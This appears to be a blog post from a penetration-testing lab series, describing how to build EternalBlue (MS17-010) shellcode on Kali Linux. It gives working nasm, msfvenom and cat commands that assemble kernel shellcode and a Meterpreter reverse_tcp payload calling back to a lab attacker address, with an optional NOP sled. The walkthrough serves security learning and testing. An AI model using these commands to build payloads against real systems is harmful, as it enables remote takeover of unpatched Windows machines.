Generating shellcode - using msfvenom to generate a binary payload

In this video we generate a binary payload (shellcode) that we will use later on to exploit the EternalBlue Windows OS vulnerability.

The article below is an excellent introduction to how a binary payload works:
https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/

Our payload has 2 parts that will be generated independently, then combined into a single file.

The first component is the Windows x64 kernel shellcode for Eternalblue exploit and the ASM code is downloaded from the following location:
https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501

We will use "nasm" (general-purpose x86 assembler) on Kali Linux, in order to compile the kernel shellcode, by using the command below:

nasm -f bin eternalblue_x64_kshellcode.asm -o sc_x64_kernel.bin

The output for this command (and the first component for our payload) is the "sc_x64_kernel.bin" file.

The second component for our payload, is the part of the code which will create the Meterpreter shell from the target back to the attacker machine. It will be generated by using the "msfvenom" utility and the "windows/x64/meterpreter/reverse_tcp" payload as per the command below:

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin LHOST=192.168.254.142 LPORT=4444

The output for this command (and the second component for our payload) is the "sc_x64_msf.bin" file.
The IP address and the port belong to the attacker machine and will have to be configured in Metasploit before exploitation. (will be shown in my next posts).

For more details on "msfvenom" command, please check the following link:
https://www.offensive-security.com/metasploit-unleashed/msfvenom/

Another Meterpreter payload version is created in the video - it is similar with the first version, but has in addition a 100 bytes NOP sled.

The NOP sled version Meterpreter payload is created by using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -n 100 -o sc_x64_msf_100n.bin LHOST=192.168.254.142 LPORT=4444

The output is the "sc_x64_msf_100n.bin" file.

A NOP sled essentially makes exploitation easier when performing buffer overflow attacks. There might be cases when the payload without NOP sled will crash the OS on the target machine, while the payload with NOP sled will work without issues. We keep the NOP sled payload as an alternative option for the case when we  have issues during the exploitation phase.

Finally we combine the two payload components into one file, by using the "cat" command:

- first time using the kernell shellcode file and the Meterpreter payload without NOP sled, by using the following command:

cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin

- second time using the kernell shellcode file and the NOP sled Meterpreter payload, by using the following command:

cat sc_x64_kernel.bin sc_x64_msf_100n.bin > sc_x64_100n.bin

We have now two binary payloads ("sc_x64.bin" and "sc_x64_100n.bin") that we will be using later on to exploit the Eternalblue Windows OS vulnerability.


Comments

Popular Posts

MS17-010 Vulnerability - Using EternalBlue exploit module in Metasploit

MS17-010 Vulnerability - Scanning using Metasploit on KALI Linux